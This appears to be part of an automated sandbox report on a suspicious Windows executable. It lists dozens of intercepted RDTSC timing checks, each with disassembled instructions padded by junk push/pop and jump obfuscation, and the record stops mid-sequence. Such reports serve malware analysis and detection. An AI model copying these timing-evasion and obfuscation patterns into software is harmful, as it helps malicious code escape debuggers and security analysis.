              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45650A second address: 45654C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B605222D0h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jp 00007F3B605222C6h 0x00000011 jmp 00007F3B605222D3h 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push edx 0x0000001d pop edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 popad 0x00000021 jnp 00007F3B605222CCh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 450FE0 second address: 450FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 450FE4 second address: 45101B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F3B605222D7h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 popad 0x00000018 push ebx 0x00000019 je 00007F3B605222C8h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45101B second address: 45101F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46406C second address: 464070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464070 second address: 464074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464074 second address: 464080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464080 second address: 464084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464084 second address: 464088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4641DE second address: 4641E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 479D09 second address: 479D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F3B605222C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 479D18 second address: 479D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 479D1C second address: 479D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 479D20 second address: 479D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 479D30 second address: 479D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 479D34 second address: 479D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE528h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478D00 second address: 478D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478D06 second address: 478D42 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3B60BFE525h 0x0000000c jnc 00007F3B60BFE516h 0x00000012 jmp 00007F3B60BFE528h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478D42 second address: 478D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 479181 second address: 47918D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F3B60BFE516h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47918D second address: 4791B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D7h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4791B0 second address: 4791B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4794D4 second address: 4794E5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3B605222C8h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 479638 second address: 47963C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C79D second address: 47C7CC instructions: 0x00000000 rdtsc 0x00000002 je 00007F3B605222D4h 0x00000008 jmp 00007F3B605222CEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F3B605222CDh 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007F3B605222C6h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C9D3 second address: 47C9DD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3B60BFE51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47FA08 second address: 47FA0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47FA0C second address: 47FA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE51Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F3B60BFE518h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47FA29 second address: 47FA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F59F second address: 47F5A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39F46E second address: 39F473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50306B5 second address: 50306BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50306BB second address: 503070D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F3B605222D1h 0x00000010 mov ch, 46h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F3B605222D3h 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F3B605222D0h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503070D second address: 5030713 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030713 second address: 5030778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 movsx edx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f mov bl, 06h 0x00000011 pop ecx 0x00000012 pushfd 0x00000013 jmp 00007F3B605222CFh 0x00000018 xor ecx, 6D7E7A7Eh 0x0000001e jmp 00007F3B605222D9h 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007F3B605222D1h 0x0000002b xchg eax, ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F3B605222CDh 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030778 second address: 5030788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B60BFE51Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030788 second address: 503078C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503078C second address: 50307AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3B60BFE523h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50307AA second address: 5030801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 call 00007F3B605222D8h 0x00000015 jmp 00007F3B605222D2h 0x0000001a pop esi 0x0000001b popad 0x0000001c lea eax, dword ptr [ebp-04h] 0x0000001f pushad 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030801 second address: 503080F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503080F second address: 5030814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030814 second address: 5030827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B60BFE51Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030827 second address: 5030835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030835 second address: 503083B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503083B second address: 5030840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503089C second address: 50308BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE51Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov esi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3B60BFE51Ah 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50308BD second address: 50308C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50308C3 second address: 503092C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3B60BFE51Ch 0x00000009 sub si, FA08h 0x0000000e jmp 00007F3B60BFE51Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F3B60BFE528h 0x0000001a sub ch, 00000068h 0x0000001d jmp 00007F3B60BFE51Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 je 00007F3B60BFE553h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F3B60BFE525h 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503092C second address: 5030932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030932 second address: 5030936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030974 second address: 5030982 instructions: 0x00000000 rdtsc 0x00000002 mov dl, A3h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 leave 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030982 second address: 5030986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030986 second address: 503099F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503099F second address: 5030084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007F3B60BFE517h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007F3B65A69953h 0x00000032 mov edi, edi 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F3B60BFE525h 0x0000003b and eax, 63370406h 0x00000041 jmp 00007F3B60BFE521h 0x00000046 popfd 0x00000047 pushfd 0x00000048 jmp 00007F3B60BFE520h 0x0000004d or cl, FFFFFFA8h 0x00000050 jmp 00007F3B60BFE51Bh 0x00000055 popfd 0x00000056 popad 0x00000057 xchg eax, ebp 0x00000058 jmp 00007F3B60BFE526h 0x0000005d push eax 0x0000005e pushad 0x0000005f mov ecx, ebx 0x00000061 movsx ebx, si 0x00000064 popad 0x00000065 xchg eax, ebp 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F3B60BFE51Eh 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030084 second address: 503008A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503008A second address: 503009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B60BFE51Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503009B second address: 50300D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F3B605222CDh 0x0000000f push FFFFFFFEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3B605222D8h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50300D0 second address: 50300D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50300D4 second address: 50300DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50300DA second address: 50300FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3B60BFE51Ch 0x00000009 xor ah, 00000058h 0x0000000c jmp 00007F3B60BFE51Bh 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50300FB second address: 50301F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 0E582239h 0x0000000c jmp 00007F3B605222D5h 0x00000011 add dword ptr [esp], 68427C0Fh 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F3B605222CCh 0x0000001f jmp 00007F3B605222D5h 0x00000024 popfd 0x00000025 popad 0x00000026 push 15A8B1ACh 0x0000002b jmp 00007F3B605222CAh 0x00000030 add dword ptr [esp], 60EC79C4h 0x00000037 pushad 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F3B605222CCh 0x0000003f sub ecx, 09039E78h 0x00000045 jmp 00007F3B605222CBh 0x0000004a popfd 0x0000004b mov bl, cl 0x0000004d popad 0x0000004e mov ecx, ebx 0x00000050 popad 0x00000051 mov eax, dword ptr fs:[00000000h] 0x00000057 jmp 00007F3B605222D7h 0x0000005c nop 0x0000005d jmp 00007F3B605222D6h 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 mov eax, 4AEB1B13h 0x0000006b pushfd 0x0000006c jmp 00007F3B605222D8h 0x00000071 jmp 00007F3B605222D5h 0x00000076 popfd 0x00000077 popad 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50301F2 second address: 503023D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b movzx eax, bx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F3B60BFE51Fh 0x00000016 add cx, 33BEh 0x0000001b jmp 00007F3B60BFE529h 0x00000020 popfd 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503023D second address: 5030264 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 8D07h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3B605222D9h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030264 second address: 5030274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B60BFE51Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030274 second address: 50302BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F3B605222CCh 0x0000000e mov dword ptr [esp], ebx 0x00000011 pushad 0x00000012 movzx eax, bx 0x00000015 movsx edx, si 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b jmp 00007F3B605222D0h 0x00000020 call 00007F3B605222D2h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50302BA second address: 5030354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 mov bx, ax 0x0000000b jmp 00007F3B60BFE528h 0x00000010 popad 0x00000011 xchg eax, esi 0x00000012 jmp 00007F3B60BFE520h 0x00000017 xchg eax, edi 0x00000018 jmp 00007F3B60BFE520h 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F3B60BFE521h 0x00000025 sbb ah, FFFFFF86h 0x00000028 jmp 00007F3B60BFE521h 0x0000002d popfd 0x0000002e jmp 00007F3B60BFE520h 0x00000033 popad 0x00000034 xchg eax, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F3B60BFE527h 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030354 second address: 503036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B605222D4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503036C second address: 5030370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030370 second address: 50303B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [769B4538h] 0x0000000d jmp 00007F3B605222D7h 0x00000012 xor dword ptr [ebp-08h], eax 0x00000015 jmp 00007F3B605222D6h 0x0000001a xor eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50303B5 second address: 50303BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50303BB second address: 50303CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B605222D0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50303CF second address: 503042D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3B60BFE529h 0x00000012 jmp 00007F3B60BFE51Bh 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007F3B60BFE528h 0x0000001e and esi, 6D8ED068h 0x00000024 jmp 00007F3B60BFE51Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503042D second address: 5030433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030433 second address: 5030437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030437 second address: 50304A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3B605222CDh 0x00000012 adc ax, 2A86h 0x00000017 jmp 00007F3B605222D1h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F3B605222D0h 0x00000023 adc si, 2528h 0x00000028 jmp 00007F3B605222CBh 0x0000002d popfd 0x0000002e popad 0x0000002f lea eax, dword ptr [ebp-10h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F3B605222D5h 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50304A5 second address: 50304AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50304AB second address: 50304AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50304AF second address: 5030518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE523h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr fs:[00000000h], eax 0x00000011 pushad 0x00000012 call 00007F3B60BFE524h 0x00000017 movzx eax, bx 0x0000001a pop ebx 0x0000001b pushad 0x0000001c push esi 0x0000001d pop edx 0x0000001e jmp 00007F3B60BFE526h 0x00000023 popad 0x00000024 popad 0x00000025 mov dword ptr [ebp-18h], esp 0x00000028 pushad 0x00000029 jmp 00007F3B60BFE51Eh 0x0000002e push eax 0x0000002f push edx 0x00000030 mov edi, esi 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030518 second address: 50305F8 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 0B7E2443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr fs:[00000018h] 0x00000010 pushad 0x00000011 jmp 00007F3B605222D4h 0x00000016 pushfd 0x00000017 jmp 00007F3B605222D2h 0x0000001c or eax, 1169BC38h 0x00000022 jmp 00007F3B605222CBh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ecx, dword ptr [eax+00000FDCh] 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F3B605222D4h 0x00000036 add cx, B698h 0x0000003b jmp 00007F3B605222CBh 0x00000040 popfd 0x00000041 mov di, cx 0x00000044 popad 0x00000045 test ecx, ecx 0x00000047 pushad 0x00000048 pushfd 0x00000049 jmp 00007F3B605222D0h 0x0000004e sbb al, FFFFFFF8h 0x00000051 jmp 00007F3B605222CBh 0x00000056 popfd 0x00000057 popad 0x00000058 jns 00007F3B605222F7h 0x0000005e pushad 0x0000005f call 00007F3B605222D0h 0x00000064 mov bl, ch 0x00000066 pop edx 0x00000067 mov si, 93B3h 0x0000006b popad 0x0000006c add eax, ecx 